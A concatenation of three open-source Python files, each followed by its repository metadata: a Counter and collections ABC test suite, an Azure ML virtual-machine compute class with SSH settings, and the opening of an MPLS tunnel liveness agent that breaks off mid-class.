self.assertFalse(f1 < f2)
self.assertTrue(r1 < f3)
self.assertFalse(r1 < f1)
self.assertFalse(r1 < f2)
self.assertTrue(r1 < r3)
self.assertFalse(r1 < r1)
self.assertFalse(r1 < r2)
with self.assertRaises(TypeError):
f1 < l3
with self.assertRaises(TypeError):
f1 < l1
with self.assertRaises(TypeError):
f1 < l2
# any subset
self.assertTrue(f1 <= f3)
self.assertTrue(f1 <= f1)
self.assertFalse(f1 <= f2)
self.assertTrue(r1 <= f3)
self.assertTrue(r1 <= f1)
self.assertFalse(r1 <= f2)
self.assertTrue(r1 <= r3)
self.assertTrue(r1 <= r1)
self.assertFalse(r1 <= r2)
with self.assertRaises(TypeError):
f1 <= l3
with self.assertRaises(TypeError):
f1 <= l1
with self.assertRaises(TypeError):
f1 <= l2
# proper superset
self.assertTrue(f3 > f1)
self.assertFalse(f1 > f1)
self.assertFalse(f2 > f1)
self.assertTrue(r3 > r1)
self.assertFalse(f1 > r1)
self.assertFalse(f2 > r1)
self.assertTrue(r3 > r1)
self.assertFalse(r1 > r1)
self.assertFalse(r2 > r1)
with self.assertRaises(TypeError):
f1 > l3
with self.assertRaises(TypeError):
f1 > l1
with self.assertRaises(TypeError):
f1 > l2
# any superset
self.assertTrue(f3 >= f1)
self.assertTrue(f1 >= f1)
self.assertFalse(f2 >= f1)
self.assertTrue(r3 >= r1)
self.assertTrue(f1 >= r1)
self.assertFalse(f2 >= r1)
self.assertTrue(r3 >= r1)
self.assertTrue(r1 >= r1)
self.assertFalse(r2 >= r1)
with self.assertRaises(TypeError):
f1 >= l3
with self.assertRaises(TypeError):
f1 >=l1
with self.assertRaises(TypeError):
f1 >= l2
# equality
self.assertTrue(f1 == f1)
self.assertTrue(r1 == f1)
self.assertTrue(f1 == r1)
self.assertFalse(f1 == f3)
self.assertFalse(r1 == f3)
self.assertFalse(f1 == r3)
self.assertFalse(f1 == l3)
self.assertFalse(f1 == l1)
self.assertFalse(f1 == l2)
# inequality
self.assertFalse(f1 != f1)
self.assertFalse(r1 != f1)
self.assertFalse(f1 != r1)
self.assertTrue(f1 != f3)
self.assertTrue(r1 != f3)
self.assertTrue(f1 != r3)
self.assertTrue(f1 != l3)
self.assertTrue(f1 != l1)
self.assertTrue(f1 != l2)
def test_Set_hash_matches_frozenset(self):
sets = [
{}, {1}, {None}, {-1}, {0.0}, {"abc"}, {1, 2, 3},
{10**100, 10**101}, {"a", "b", "ab", ""}, {False, True},
{object(), object(), object()}, {float("nan")}, {frozenset()},
{*range(1000)}, {*range(1000)} - {100, 200, 300},
{*range(sys.maxsize - 10, sys.maxsize + 10)},
]
for s in sets:
fs = frozenset(s)
self.assertEqual(hash(fs), Set._hash(fs), msg=s)
def test_Mapping(self):
for sample in [dict]:
self.assertIsInstance(sample(), Mapping)
self.assertTrue(issubclass(sample, Mapping))
self.validate_abstract_methods(Mapping, '__contains__', '__iter__', '__len__',
'__getitem__')
class MyMapping(Mapping):
def __len__(self):
return 0
def __getitem__(self, i):
raise IndexError
def __iter__(self):
return iter(())
self.validate_comparison(MyMapping())
self.assertRaises(TypeError, reversed, MyMapping())
def test_MutableMapping(self):
for sample in [dict]:
self.assertIsInstance(sample(), MutableMapping)
self.assertTrue(issubclass(sample, MutableMapping))
self.validate_abstract_methods(MutableMapping, '__contains__', '__iter__', '__len__',
'__getitem__', '__setitem__', '__delitem__')
def test_MutableMapping_subclass(self):
# Test issue 9214
mymap = UserDict()
mymap['red'] = 5
self.assertIsInstance(mymap.keys(), Set)
self.assertIsInstance(mymap.keys(), KeysView)
self.assertIsInstance(mymap.items(), Set)
self.assertIsInstance(mymap.items(), ItemsView)
mymap = UserDict()
mymap['red'] = 5
z = mymap.keys() | {'orange'}
self.assertIsInstance(z, set)
list(z)
mymap['blue'] = 7 # Shouldn't affect 'z'
self.assertEqual(sorted(z), ['orange', 'red'])
mymap = UserDict()
mymap['red'] = 5
z = mymap.items() | {('orange', 3)}
self.assertIsInstance(z, set)
list(z)
mymap['blue'] = 7 # Shouldn't affect 'z'
self.assertEqual(z, {('orange', 3), ('red', 5)})
def test_Sequence(self):
for sample in [tuple, list, bytes, str]:
self.assertIsInstance(sample(), Sequence)
self.assertTrue(issubclass(sample, Sequence))
self.assertIsInstance(range(10), Sequence)
self.assertTrue(issubclass(range, Sequence))
self.assertIsInstance(memoryview(b""), Sequence)
self.assertTrue(issubclass(memoryview, Sequence))
self.assertTrue(issubclass(str, Sequence))
self.validate_abstract_methods(Sequence, '__contains__', '__iter__', '__len__',
'__getitem__')
def test_Sequence_mixins(self):
class SequenceSubclass(Sequence):
def __init__(self, seq=()):
self.seq = seq
def __getitem__(self, index):
return self.seq[index]
def __len__(self):
return len(self.seq)
# Compare Sequence.index() behavior to (list|str).index() behavior
def assert_index_same(seq1, seq2, index_args):
try:
expected = seq1.index(*index_args)
except ValueError:
with self.assertRaises(ValueError):
seq2.index(*index_args)
else:
actual = seq2.index(*index_args)
self.assertEqual(
actual, expected, '%r.index%s' % (seq1, index_args))
for ty in list, str:
nativeseq = ty('abracadabra')
indexes = [-10000, -9999] + list(range(-3, len(nativeseq) + 3))
seqseq = SequenceSubclass(nativeseq)
for letter in set(nativeseq) | {'z'}:
assert_index_same(nativeseq, seqseq, (letter,))
for start in range(-3, len(nativeseq) + 3):
assert_index_same(nativeseq, seqseq, (letter, start))
for stop in range(-3, len(nativeseq) + 3):
assert_index_same(
nativeseq, seqseq, (letter, start, stop))
def test_ByteString(self):
for sample in [bytes, bytearray]:
self.assertIsInstance(sample(), ByteString)
self.assertTrue(issubclass(sample, ByteString))
for sample in [str, list, tuple]:
self.assertNotIsInstance(sample(), ByteString)
self.assertFalse(issubclass(sample, ByteString))
self.assertNotIsInstance(memoryview(b""), ByteString)
self.assertFalse(issubclass(memoryview, ByteString))
def test_MutableSequence(self):
for sample in [tuple, str, bytes]:
self.assertNotIsInstance(sample(), MutableSequence)
self.assertFalse(issubclass(sample, MutableSequence))
for sample in [list, bytearray, deque]:
self.assertIsInstance(sample(), MutableSequence)
self.assertTrue(issubclass(sample, MutableSequence))
self.assertFalse(issubclass(str, MutableSequence))
self.validate_abstract_methods(MutableSequence, '__contains__', '__iter__',
'__len__', '__getitem__', '__setitem__', '__delitem__', 'insert')
def test_MutableSequence_mixins(self):
# Test the mixins of MutableSequence by creating a minimal concrete
# class inherited from it.
class MutableSequenceSubclass(MutableSequence):
def __init__(self):
self.lst = []
def __setitem__(self, index, value):
self.lst[index] = value
def __getitem__(self, index):
return self.lst[index]
def __len__(self):
return len(self.lst)
def __delitem__(self, index):
del self.lst[index]
def insert(self, index, value):
self.lst.insert(index, value)
mss = MutableSequenceSubclass()
mss.append(0)
mss.extend((1, 2, 3, 4))
self.assertEqual(len(mss), 5)
self.assertEqual(mss[3], 3)
mss.reverse()
self.assertEqual(mss[3], 1)
mss.pop()
self.assertEqual(len(mss), 4)
mss.remove(3)
self.assertEqual(len(mss), 3)
mss += (10, 20, 30)
self.assertEqual(len(mss), 6)
self.assertEqual(mss[-1], 30)
mss.clear()
self.assertEqual(len(mss), 0)
# issue 34427
# extending self should not cause infinite loop
items = 'ABCD'
mss2 = MutableSequenceSubclass()
mss2.extend(items + items)
mss.clear()
mss.extend(items)
mss.extend(mss)
self.assertEqual(len(mss), len(mss2))
self.assertEqual(list(mss), list(mss2))
def test_illegal_patma_flags(self):
with self.assertRaises(TypeError):
class Both(Collection):
__abc_tpflags__ = (Sequence.__flags__ | Mapping.__flags__)
################################################################################
### Counter
################################################################################
class CounterSubclassWithSetItem(Counter):
# Test a counter subclass that overrides __setitem__
def __init__(self, *args, **kwds):
self.called = False
Counter.__init__(self, *args, **kwds)
def __setitem__(self, key, value):
self.called = True
Counter.__setitem__(self, key, value)
class CounterSubclassWithGet(Counter):
# Test a counter subclass that overrides get()
def __init__(self, *args, **kwds):
self.called = False
Counter.__init__(self, *args, **kwds)
def get(self, key, default):
self.called = True
return Counter.get(self, key, default)
class TestCounter(unittest.TestCase):
def test_basics(self):
c = Counter('abcaba')
self.assertEqual(c, Counter({'a':3 , 'b': 2, 'c': 1}))
self.assertEqual(c, Counter(a=3, b=2, c=1))
self.assertIsInstance(c, dict)
self.assertIsInstance(c, Mapping)
self.assertTrue(issubclass(Counter, dict))
self.assertTrue(issubclass(Counter, Mapping))
self.assertEqual(len(c), 3)
self.assertEqual(sum(c.values()), 6)
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.keys()), ['a', 'b', 'c'])
self.assertEqual(list(c), ['a', 'b', 'c'])
self.assertEqual(list(c.items()),
[('a', 3), ('b', 2), ('c', 1)])
self.assertEqual(c['b'], 2)
self.assertEqual(c['z'], 0)
self.assertEqual(c.__contains__('c'), True)
self.assertEqual(c.__contains__('z'), False)
self.assertEqual(c.get('b', 10), 2)
self.assertEqual(c.get('z', 10), 10)
self.assertEqual(c, dict(a=3, b=2, c=1))
self.assertEqual(repr(c), "Counter({'a': 3, 'b': 2, 'c': 1})")
self.assertEqual(c.most_common(), [('a', 3), ('b', 2), ('c', 1)])
for i in range(5):
self.assertEqual(c.most_common(i),
[('a', 3), ('b', 2), ('c', 1)][:i])
self.assertEqual(''.join(c.elements()), 'aaabbc')
c['a'] += 1 # increment an existing value
c['b'] -= 2 # sub existing value to zero
del c['c'] # remove an entry
del c['c'] # make sure that del doesn't raise KeyError
c['d'] -= 2 # sub from a missing value
c['e'] = -5 # directly assign a missing value
c['f'] += 4 # add to a missing value
self.assertEqual(c, dict(a=4, b=0, d=-2, e=-5, f=4))
self.assertEqual(''.join(c.elements()), 'aaaaffff')
self.assertEqual(c.pop('f'), 4)
self.assertNotIn('f', c)
for i in range(3):
elem, cnt = c.popitem()
self.assertNotIn(elem, c)
c.clear()
self.assertEqual(c, {})
self.assertEqual(repr(c), 'Counter()')
self.assertRaises(NotImplementedError, Counter.fromkeys, 'abc')
self.assertRaises(TypeError, hash, c)
c.update(dict(a=5, b=3))
c.update(c=1)
c.update(Counter('a' * 50 + 'b' * 30))
c.update() # test case with no args
c.__init__('a' * 500 + 'b' * 300)
c.__init__('cdc')
c.__init__()
self.assertEqual(c, dict(a=555, b=333, c=3, d=1))
self.assertEqual(c.setdefault('d', 5), 1)
self.assertEqual(c['d'], 1)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(c['e'], 5)
def test_init(self):
self.assertEqual(list(Counter(self=42).items()), [('self', 42)])
self.assertEqual(list(Counter(iterable=42).items()), [('iterable', 42)])
self.assertEqual(list(Counter(iterable=None).items()), [('iterable', None)])
self.assertRaises(TypeError, Counter, 42)
self.assertRaises(TypeError, Counter, (), ())
self.assertRaises(TypeError, Counter.__init__)
def test_total(self):
c = Counter(a=10, b=5, c=0)
self.assertEqual(c.total(), 15)
def test_order_preservation(self):
# Input order dictates items() order
self.assertEqual(list(Counter('abracadabra').items()),
[('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)])
# letters with same count: ^----------^ ^---------^
# Verify retention of order even when all counts are equal
self.assertEqual(list(Counter('xyzpdqqdpzyx').items()),
[('x', 2), ('y', 2), ('z', 2), ('p', 2), ('d', 2), ('q', 2)])
# Input order dictates elements() order
self.assertEqual(list(Counter('abracadabra simsalabim').elements()),
['a', 'a', 'a', 'a', 'a', 'a', 'a', 'b', 'b', 'b','r',
'r', 'c', 'd', ' ', 's', 's', 'i', 'i', 'm', 'm', 'l'])
# Math operations order first by the order encountered in the left
# operand and then by the order encountered in the right operand.
ps = 'aaabbcdddeefggghhijjjkkl'
qs = 'abbcccdeefffhkkllllmmnno'
order = {letter: i for i, letter in enumerate(dict.fromkeys(ps + qs))}
def correctly_ordered(seq):
'Return true if the letters occur in the expected order'
positions = [order[letter] for letter in seq]
return positions == sorted(positions)
p, q = Counter(ps), Counter(qs)
self.assertTrue(correctly_ordered(+p))
self.assertTrue(correctly_ordered(-p))
self.assertTrue(correctly_ordered(p + q))
self.assertTrue(correctly_ordered(p - q))
self.assertTrue(correctly_ordered(p | q))
self.assertTrue(correctly_ordered(p & q))
p, q = Counter(ps), Counter(qs)
p += q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p -= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p |= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p &= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p.update(q)
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p.subtract(q)
self.assertTrue(correctly_ordered(p))
def test_update(self):
c = Counter()
c.update(self=42)
self.assertEqual(list(c.items()), [('self', 42)])
c = Counter()
c.update(iterable=42)
self.assertEqual(list(c.items()), [('iterable', 42)])
c = Counter()
c.update(iterable=None)
self.assertEqual(list(c.items()), [('iterable', None)])
self.assertRaises(TypeError, Counter().update, 42)
self.assertRaises(TypeError, Counter().update, {}, {})
self.assertRaises(TypeError, Counter.update)
def test_copying(self):
# Check that counters are copyable, deepcopyable, picklable, and
#have a repr/eval round-trip
words = Counter('which witch had which witches wrist watch'.split())
def check(dup):
msg = "\ncopy: %s\nwords: %s" % (dup, words)
self.assertIsNot(dup, words, msg)
self.assertEqual(dup, words)
check(words.copy())
check(copy.copy(words))
check(copy.deepcopy(words))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
check(pickle.loads(pickle.dumps(words, proto)))
check(eval(repr(words)))
update_test = Counter()
update_test.update(words)
check(update_test)
check(Counter(words))
def test_copy_subclass(self):
class MyCounter(Counter):
pass
c = MyCounter('slartibartfast')
d = c.copy()
self.assertEqual(d, c)
self.assertEqual(len(d), len(c))
self.assertEqual(type(d), type(c))
def test_conversions(self):
# Convert to: set, list, dict
s = 'she sells sea shells by the sea shore'
self.assertEqual(sorted(Counter(s).elements()), sorted(s))
self.assertEqual(sorted(Counter(s)), sorted(set(s)))
self.assertEqual(dict(Counter(s)), dict(Counter(s).items()))
self.assertEqual(set(Counter(s)), set(s))
def test_invariant_for_the_in_operator(self):
c = Counter(a=10, b=-2, c=0)
for elem in c:
self.assertTrue(elem in c)
self.assertIn(elem, c)
def test_multiset_operations(self):
# Verify that adding a zero counter will strip zeros and negatives
c = Counter(a=10, b=-2, c=0) + Counter()
self.assertEqual(dict(c), dict(a=10))
elements = 'abcd'
for i in range(1000):
# test random pairs of multisets
p = Counter(dict((elem, randrange(-2,4)) for elem in elements))
p.update(e=1, f=-1, g=0)
q = Counter(dict((elem, randrange(-2,4)) for elem in elements))
q.update(h=1, i=-1, j=0)
for counterop, numberop in [
(Counter.__add__, lambda x, y: max(0, x+y)),
(Counter.__sub__, lambda x, y: max(0, x-y)),
(Counter.__or__, lambda x, y: max(0,x,y)),
(Counter.__and__, lambda x, y: max(0, min(x,y))),
]:
result = counterop(p, q)
for x in elements:
self.assertEqual(numberop(p[x], q[x]), result[x],
(counterop, x, p, q))
# verify that results exclude non-positive counts
self.assertTrue(x>0 for x in result.values())
elements = 'abcdef'
for i in range(100):
# verify that random multisets with no repeats are exactly like sets
p = Counter(dict((elem, randrange(0, 2)) for elem in elements))
q = Counter(dict((elem, randrange(0, 2)) for elem in elements))
for counterop, setop in [
(Counter.__sub__, set.__sub__),
(Counter.__or__, set.__or__),
(Counter.__and__, set.__and__),
]:
counter_result = counterop(p, q)
set_result = setop(set(p.elements()), set(q.elements()))
self.assertEqual(counter_result, dict.fromkeys(set_result, 1))
def test_inplace_operations(self):
elements = 'abcd'
for i in range(1000):
# test random pairs of multisets
p = Counter(dict((elem, randrange(-2,4)) for elem in elements))
p.update(e=1, f=-1, g=0)
q = Counter(dict((elem, randrange(-2,4)) for elem in elements))
q.update(h=1, i=-1, j=0)
for inplace_op, regular_op in [
(Counter.__iadd__, Counter.__add__),
(Counter.__isub__, Counter.__sub__),
(Counter.__ior__, Counter.__or__),
(Counter.__iand__, Counter.__and__),
]:
c = p.copy()
c_id = id(c)
regular_result = regular_op(c, q)
inplace_result = inplace_op(c, q)
self.assertEqual(inplace_result, regular_result)
self.assertEqual(id(inplace_result), c_id)
def test_subtract(self):
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
c.subtract(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50)
self.assertEqual(c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50))
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
c.subtract(Counter(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50))
self.assertEqual(c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50))
c = Counter('aaabbcd')
c.subtract('aaaabbcce')
self.assertEqual(c, Counter(a=-1, b=0, c=-1, d=1, e=-1))
c = Counter()
c.subtract(self=42)
self.assertEqual(list(c.items()), [('self', -42)])
c = Counter()
c.subtract(iterable=42)
self.assertEqual(list(c.items()), [('iterable', -42)])
self.assertRaises(TypeError, Counter().subtract, 42)
self.assertRaises(TypeError, Counter().subtract, {}, {})
self.assertRaises(TypeError, Counter.subtract)
def test_unary(self):
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
self.assertEqual(dict(+c), dict(c=5, d=10, e=15, g=40))
self.assertEqual(dict(-c), dict(a=5))
def test_repr_nonsortable(self):
c = Counter(a=2, b=None)
r = repr(c)
self.assertIn("'a': 2", r)
self.assertIn("'b': None", r)
def test_helper_function(self):
# two paths, one for real dicts and one for other mappings
elems = list('abracadabra')
d = dict()
_count_elements(d, elems)
self.assertEqual(d, {'a': 5, 'r': 2, 'b': 2, 'c': 1, 'd': 1})
m = OrderedDict()
_count_elements(m, elems)
self.assertEqual(m,
OrderedDict([('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)]))
# test fidelity to the pure python version
c = CounterSubclassWithSetItem('abracadabra')
self.assertTrue(c.called)
self.assertEqual(dict(c), {'a': 5, 'b': 2, 'c': 1, 'd': 1, 'r':2 })
c = CounterSubclassWithGet('abracadabra')
self.assertTrue(c.called)
self.assertEqual(dict(c), {'a': 5, 'b': 2, 'c': 1, 'd': 1, 'r':2 })
def test_multiset_operations_equivalent_to_set_operations(self):
# When the multiplicities are all zero or one, multiset operations
# are guaranteed to be equivalent to the corresponding operations
# for regular sets.
s = list(product(('a', 'b', 'c'), range(2)))
powerset = chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
counters = [Counter(dict(groups)) for groups in powerset]
for cp, cq in product(counters, repeat=2):
sp = set(cp.elements())
sq = set(cq.elements())
self.assertEqual(set(cp + cq), sp | sq)
self.assertEqual(set(cp - cq), sp - sq)
self.assertEqual(set(cp | cq), sp | sq)
self.assertEqual(set(cp & cq), sp & sq)
self.assertEqual(cp == cq, sp == sq)
self.assertEqual(cp != cq, sp != sq)
self.assertEqual(cp <= cq, sp <= sq)
self.assertEqual(cp >= cq, sp >= sq)
self.assertEqual(cp < cq, sp < sq)
self.assertEqual(cp > cq, sp > sq)
def test_eq(self):
self.assertEqual(Counter(a=3, b=2, c=0), Counter('ababa'))
self.assertNotEqual(Counter(a=3, b=2), Counter('babab'))
def test_le(self):
self.assertTrue(Counter(a=3, b=2, c=0) <= Counter('ababa'))
self.assertFalse(Counter(a=3, b=2) <= Counter('babab'))
def test_lt(self):
self.assertTrue(Counter(a=3, b=1, c=0) < Counter('ababa'))
self.assertFalse(Counter(a=3, b=2, c=0) < Counter('ababa'))
def test_ge(self):
self.assertTrue(Counter(a=2, b=1, c=0) >= Counter('aab'))
self.assertFalse(Counter(a=3, b=2, c=0) >= Counter('aabd'))
def test_gt(self):
self.assertTrue(Counter(a=3, b=2, c=0) > Counter('aab'))
self.assertFalse(Counter(a=2, b=1, c=0) > Counter('aab'))
def load_tests(loader, tests, pattern):
tests.addTest(doctest.DocTestSuite(collections))
return tests
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "7cb65650f7db561f5a6d7d20e32a7ef9",
"timestamp": "",
"source": "github",
"line_count": 2375,
"max_line_length": 107,
"avg_line_length": 39.654315789473685,
"alnum_prop": 0.5315303836311704,
"repo_name": "brython-dev/brython",
"id": "fa1d0e014dee923f0f3539a31375b95db9225f1f",
"size": "94179",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "www/src/Lib/test/test_collections.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "24308"
},
{
"name": "HTML",
"bytes": "5144999"
},
{
"name": "JavaScript",
"bytes": "4143100"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "22236375"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
from pathlib import Path
from typing import Dict, Optional
from azure.ai.ml._restclient.v2022_10_01_preview.models import ComputeResource
from azure.ai.ml._restclient.v2022_10_01_preview.models import VirtualMachine as VMResource
from azure.ai.ml._restclient.v2022_10_01_preview.models import (
VirtualMachineSchemaProperties,
VirtualMachineSshCredentials,
)
from azure.ai.ml._schema.compute.virtual_machine_compute import VirtualMachineComputeSchema
from azure.ai.ml.constants._common import BASE_PATH_CONTEXT_KEY, TYPE
from azure.ai.ml.constants._compute import ComputeType
from azure.ai.ml.entities._compute.compute import Compute
from azure.ai.ml.entities._util import load_from_dict
class VirtualMachineSshSettings:
def __init__(
self,
*,
admin_username: str,
admin_password: str = None,
ssh_port: int = 22,
ssh_private_key_file: str = None,
):
"""SSH settings for a virtual machine.
:param admin_username: Describes the admin user name., defaults to None.
:type admin_username: str, required
:param admin_password: Describes the admin user password.
Defaults to None. Required if ssh_private_key_file is not specified.
:type admin_password: str, optional
:param ssh_port: The ssh port number. Default is 22.
:type ssh_port: str, optional
:param ssh_private_key_file: Specifies the file containing SSH rsa private key.
Use "ssh-keygen -t rsa -b 2048" to generate your SSH key pairs.
Required if admin_password is not specified.
:type ssh_private_key_file: str, optional
"""
self.admin_username = admin_username
self.admin_password = admin_password
self.ssh_port = ssh_port
self.ssh_private_key_file = ssh_private_key_file
class VirtualMachineCompute(Compute):
"""Virtual Machine Compute resource.
:param name: Name of the compute
:type name: str
:param description: Description of the resource.
:type description: Optional[str], optional
:param resource_id: ARM resource id of the underlying compute
:type resource_id: str
:param ssh_settings: SSH settings.
:type ssh_settings: VirtualMachineSshSettings, optional
"""
def __init__(
self,
*,
name: str,
description: Optional[str] = None,
resource_id: str,
ssh_settings: VirtualMachineSshSettings = None,
**kwargs,
):
kwargs[TYPE] = ComputeType.VIRTUALMACHINE
self._public_key_data = kwargs.pop("public_key_data", None)
super().__init__(
name=name,
location=kwargs.pop("location", None),
description=description,
resource_id=resource_id,
**kwargs,
)
self.ssh_settings = ssh_settings
@property
def public_key_data(self) -> str:
"""Public key data.
return: Public key data.
rtype: str
"""
return self._public_key_data
@classmethod
def _load_from_rest(cls, rest_obj: ComputeResource) -> "VirtualMachineCompute":
prop = rest_obj.properties
credentials = prop.properties.administrator_account if prop.properties else None
ssh_settings_param = None
if credentials or (prop.properties and prop.properties.ssh_port):
ssh_settings_param = VirtualMachineSshSettings(
admin_username=credentials.username if credentials else None,
admin_password=credentials.password if credentials else None,
ssh_port=prop.properties.ssh_port if prop.properties else None,
)
response = VirtualMachineCompute(
name=rest_obj.name,
id=rest_obj.id,
description=prop.description,
location=rest_obj.location,
resource_id=prop.resource_id,
public_key_data=credentials.public_key_data if credentials else None,
provisioning_state=prop.provisioning_state,
provisioning_errors=prop.provisioning_errors[0].error.code
if (prop.provisioning_errors and len(prop.provisioning_errors) > 0)
else None,
ssh_settings=ssh_settings_param,
)
return response
def _to_dict(self) -> Dict:
# pylint: disable=no-member
return VirtualMachineComputeSchema(context={BASE_PATH_CONTEXT_KEY: "./"}).dump(self)
@classmethod
def _load_from_dict(cls, data: Dict, context: Dict, **kwargs) -> "VirtualMachineCompute":
loaded_data = load_from_dict(VirtualMachineComputeSchema, data, context, **kwargs)
return VirtualMachineCompute(**loaded_data)
def _to_rest_object(self) -> ComputeResource:
ssh_key_value = None
if self.ssh_settings and self.ssh_settings.ssh_private_key_file:
ssh_key_value = Path(self.ssh_settings.ssh_private_key_file).read_text()
credentials = VirtualMachineSshCredentials(
username=self.ssh_settings.admin_username if self.ssh_settings else None,
password=self.ssh_settings.admin_password if self.ssh_settings else None,
public_key_data=self.public_key_data,
private_key_data=ssh_key_value,
)
properties = VirtualMachineSchemaProperties(
ssh_port=self.ssh_settings.ssh_port,
administrator_account=credentials
)
vm_compute = VMResource(
properties=properties,
resource_id=self.resource_id,
description=self.description,
)
resource = ComputeResource(name=self.name, location=self.location, properties=vm_compute)
return resource
|
{
"content_hash": "c7fede0fb8cde7cbad930e3b6c4709c3",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 97,
"avg_line_length": 40.06993006993007,
"alnum_prop": 0.6521815008726003,
"repo_name": "Azure/azure-sdk-for-python",
"id": "5f0a64ef2516b111a364b5a0b72439a6c742cc89",
"size": "5910",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/entities/_compute/virtual_machine_compute.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
""" This program provides an agent that sends and responds to
health-check packets in order to determine the liveliness of the
configured MPLS tunnels. """
import eossdk
import eossdk_utils
import functools
import json
import os
import pyinotify
import scapy
import scapy.fields
import scapy.layers.l2
import scapy.layers.inet
import scapy.packet
import scapy.route
import scapy.sendrecv
import socket
import struct
import sys
import time
# Requires: RPMs for scapy and EosSdk, as well as the eossdk_utils.py
# script (for debugging). Tunnel configuration is done at the bottom
# of this file in the main function.
# The main agent is located in the MplsTunnelLivenessAgent class below.
POLL_TIME = 1 # how often to send a liveness packet in seconds
TIMEOUT_TIME = 5 # seconds before a tunnel is declared dead
STARTUP_GRACEPERIOD = 0 # seconds after startup before we start checking a tunnel
# Make sure your IP tables are up to date on the switch:
# > sudo iptables -I INPUT -p UDP --dport 17171 -j ACCEPT
UDP_PORT = 17171
MAX_PKT_SIZE = 2048 # The maximum payload size of our packet
MAX_INT = 0xffffffff # The maximum size of a 4 byte unsigned int
class Message(object):
""" A Message is the payload of the health-check packets that this
agent sends out and receives. It consists of two parts. The first
is a header that contains an number that identifies which tunnel
the sender sent this message out of. The header also contains a
numeric id of the packet, and finally, a number describing how many
'entries' are in the second part of the packet. This second part is
a list of 0 or more 'tunnel status entries'. Each entry contains a
numeric tunnel identifier and a boolean describing whether the
sending switch thinks that tunnel is alive or not."""
# Header consists of (version, pid, sender's tunnel key, msg id,
# num status entries), as integers, in little-endian:
header_format = '<IIIII'
header_len = struct.calcsize(header_format)
tunnel_entry_format = '<I?' # tunnel_key, bool
tunnel_entry_len = struct.calcsize(tunnel_entry_format)
def __init__(self, pid, egress_tunnel_key, msg_id, tunnel_liveness):
self.pid = pid
self.egress_tunnel_key = egress_tunnel_key
self.msg_id = msg_id
# Mapping from tunnel_key to boolean whether this is alive or not
self.tunnel_liveness = tunnel_liveness
def serialize(self):
# First put the length of this packet
ret = struct.pack(Message.header_format, 1, self.pid, self.egress_tunnel_key,
self.msg_id, len(self.tunnel_liveness))
for tunnel_key, is_alive in self.tunnel_liveness.iteritems():
ret += struct.pack(Message.tunnel_entry_format, tunnel_key, is_alive)
if len(ret) > MAX_PKT_SIZE:
assert False, "Packet %s too large to send!" % self.__str__()
return ret
def __str__(self):
return "Message(sender_pid=%d, egress_tunnel_key=%d, id=%d, %r)" % (
self.pid, self.egress_tunnel_key, self.msg_id, self.tunnel_liveness)
@staticmethod
def deserialize(buf):
""" Given a buffer, create and return a Message from the
buffer's contents. If the buffer does not contain a valid
Message, this returns None.
"""
if len(buf) < Message.header_len:
return None
version, pid, egress_tunnel_key, msg_id, num_entries = struct.unpack(
Message.header_format, buf[:Message.header_len])
if version != 1:
return None
msg_len = Message.header_len + Message.tunnel_entry_len * num_entries
if len(buf) < msg_len:
return None
liveness = {}
for i in xrange(Message.header_len, msg_len,
Message.tunnel_entry_len):
# Unpack each status entry reported in this packet
key, is_alive = struct.unpack(Message.tunnel_entry_format,
buf[i: i + Message.tunnel_entry_len])
liveness[key] = is_alive
return Message(pid, egress_tunnel_key, msg_id, liveness)
class EgressTunnel(object):
""" Contains the configuration and status of this switch's outgoing
tunnels. """
def __init__(self, label, nexthop_ip_addr):
# Configurable attributes
self.mpls_label = label
self.nexthop_ip = nexthop_ip_addr
# Dynamic attributes:
# The bridging MAC of the nexthop:
self.nexthop_eth_addr = None
# The interface the nexthop_eth_addr lives on:
self.egress_intf = None
# ... and the MAC address of that interface:
self.egress_intf_eth_addr = None
self.last_update_time = 0
self.is_alive = True
class RemoteTunnelStatus(object):
""" Tracks the status of a remote tunnel (a tunnel where the packet
sender is the remote switch). """
def __init__(self):
self.last_rx_msg_id = 0
self.last_update_time = time.time()
class RemoteSwitch(object):
""" This object stores the configuration for our outgoing tunnels to
this remote switch, as well as a status collection containing our view on
the liveness of that switch's tunnels to us. """
def __init__(self, dest_ip):
# Configuration
# The IP address of the remote switch
self.destination_ip = dest_ip
# The following dictionary keeps track of our outgoing tunnels
# to this switch. It is a mapping from integer tunnel_key to a
# EgressTunnel()
self.egress_tunnels = {}
